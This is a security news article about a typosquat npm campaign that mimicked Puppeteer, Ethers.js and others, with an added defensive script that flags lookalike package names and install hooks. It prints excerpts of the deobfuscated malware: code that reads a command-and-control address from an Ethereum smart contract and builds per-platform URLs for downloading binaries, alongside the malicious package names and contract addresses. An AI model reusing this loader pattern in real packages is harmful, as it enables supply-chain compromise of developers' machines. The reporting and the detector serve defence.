Over 280 malicious typosquat packages have been unearthed in an ongoing campaign targeting JavaScript developers using the popular npm (Node Package Manager) ecosystem.
The attack, which began in late October 2024, is specifically aimed at developers who rely on widely used libraries such as Puppeteer, Bignum.js, and various cryptocurrency libraries, including Ethers.js.
This campaign demonstrates the increasing sophistication of supply chain attacks that exploit the open-source community’s trust.
According to Phylum's report, like many such campaigns, this one began stealthily with a few initial test publications. The first malicious package detected was named daun124wdsa8 and was published to npm.
This package presented itself as a legitimate tool by mimicking the metadata of popular libraries. However, upon closer inspection, it contained a suspicious postinstall script.
This script was designed to execute a JavaScript file (clzypp8j.js) during installation. Fortunately, the attacker made a mistake: the file the script was meant to execute was missing from the package, rendering the attack ineffective.
However, the attackers quickly corrected this oversight in subsequent publications. Shortly after, new packages, zalfausi8 and zalf22ausi8, appeared.
These packages contained heavily obfuscated JavaScript designed to download and execute malicious binaries on the victim’s machine.
By the time the community became aware of the threat, the campaign had expanded to include 280+ typosquat packages.
What is a Typosquat Attack?
A typosquat attack is a clever social engineering technique where attackers create malicious packages with names that closely resemble legitimate ones.
For example, in this campaign, the attackers created packages named pupeter and pupetier, which are slight misspellings of the widely-used Puppeteer library.
Developers who mistype the library name might inadvertently install the malicious package, allowing attackers to compromise their systems.
These packages often mimic the versioning of the legitimate package to appear more credible.
In this case, the malicious packages were published under version 23.6.1, which coincides with the most recent release of the legitimate Puppeteer library at the time of the attack.
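A defender-side check for exactly this pattern, added here as an example (it is not code from the article or from Phylum's report): it flags dependency names that sit one or two edits away from a well-known package and raises the severity when the package also declares an install-time lifecycle script. The POPULAR allow-list and SAMPLE_DEPS are constructed sample data.

```javascript
// Added example, not from the article or Phylum's report: a pre-install check that
// flags dependency names one or two edits away from a well-known package, the
// pattern this campaign used (pupeter / pupetier vs puppeteer). POPULAR is a
// constructed sample allow-list, not an authoritative registry.
const POPULAR = ["puppeteer", "bignum", "ethers", "web3", "express", "lodash"];
// Optimal string alignment distance: insert/delete/substitute, with an adjacent
// transposition ("pupepteer") counted as one edit.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) =>
    Array.from({ length: b.length + 1 }, (_, j) => (i === 0 ? j : j === 0 ? i : 0)));
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}
// Closest popular package within two edits, or null; exact matches are fine.
function typosquatCandidate(name, popular = POPULAR) {
  const bare = name.toLowerCase().replace(/^@[^/]+\//, ""); // drop any @scope/
  if (popular.includes(bare)) return null;
  let best = null;
  for (const p of popular) {
    const dist = editDistance(bare, p);
    if (dist <= 2 && (!best || dist < best.distance)) best = { lookalike: p, distance: dist };
  }
  return best;
}
// deps: { name: { version, scripts? } } from each package's package.json. A lifecycle
// install hook raises severity: a postinstall script is what ran clzypp8j.js here.
function auditDependencies(deps) {
  const findings = [];
  for (const [name, meta] of Object.entries(deps)) {
    const hit = typosquatCandidate(name);
    if (!hit) continue;
    const hasHook = ["preinstall", "install", "postinstall"].some(k => k in (meta.scripts || {}));
    findings.push({ name, ...hit, severity: hasHook ? "high" : "medium" });
  }
  return findings;
}
const SAMPLE_DEPS = { // constructed sample mirroring the campaign's 23.6.1 pinning
  puppeteer: { version: "23.6.1" }, lodash: { version: "4.17.21" },
  pupeter: { version: "23.6.1", scripts: { postinstall: "node clzypp8j.js" } },
  pupetier: { version: "23.6.1" },
};
```

Running auditDependencies over the dependency tree before `npm install` (or with `--ignore-scripts` set until the findings are reviewed) turns the lookalike names into a blocking signal rather than something a developer notices after the postinstall hook has already run.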
The core of the attack involves obfuscated JavaScript that runs during the installation of the malicious package.
A key component of the code is its ability to fetch a remote IP address from an Ethereum smart contract.
By interacting with the Ethereum blockchain, attackers hide the IP addresses of their command-and-control servers, making it much harder for security researchers to track and shut them down.
Here’s a breakdown of the deobfuscated code:
const { ethers } = require("ethers");
// Minimal ABI: a single view function that returns a string stored per account.
const abi = ["function getString(address account) public view returns (string)"];
const provider = ethers.getDefaultProvider("mainnet");
const contract = new ethers.Contract('0xa1b40044EBc2794f207D45143Bd82a1B86156c6b', abi, provider);
// Resolves the command-and-control host by reading it from the contract, so the
// address never appears in the package itself and can be changed on-chain.
const fetchAndUpdateIp = async () => {
  try {
    const ipAddrFromContract = await contract.getString("0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84");
    return ipAddrFromContract;
  } catch (error) {
    console.error("Error fetching IP address:", error);
    // Retries without limit or backoff until the lookup succeeds.
    return await fetchAndUpdateIp();
  }
};
This code interacts with an Ethereum smart contract to fetch an IP address.
The smart contract stores the IP addresses of the attacker’s servers, allowing the malware to dynamically update its connection points without hardcoding them into the package.
Once the IP address is retrieved, the malware constructs a URL to download a binary file specific to the victim’s operating system.
const os = require("os"); // needed for os.platform(); omitted from the excerpt
// Builds a per-platform download URL from the host resolved via the contract.
const getDownloadUrl = hostAddr => {
  const platform = os.platform();
  switch (platform) {
    case 'win32': return hostAddr + "/node-win.exe";
    case "linux": return hostAddr + "/node-linux";
    case "darwin": return hostAddr + "/node-macos";
    default: throw new Error("Unsupported platform: " + platform);
  }
};
After downloading the appropriate binary, the malware executes it in the background, granting the attacker full control over the compromised system.
Once installed, the malware persists on the system by adding to the startup process, ensuring it runs every time the machine reboots.
It also collects detailed information about the victim's machine, including the CPU, GPU, memory, operating system, and username, and sends this data back to the attacker's server.
This campaign is the latest in a growing wave of supply chain attacks that target developers through open-source ecosystems like npm, PyPI, and others.
In recent years, attackers have increasingly focused on these platforms, knowing that compromising a single package could give them access to thousands of projects and systems.
While the attackers in this campaign rely on typosquatting for initial access, the ultimate goal remains the same: gaining control over the victim's machine to exfiltrate data, deploy ransomware, or conduct further attacks.
Attackers constantly evolve tactics, finding new ways to exploit the trust developers place in open-source repositories.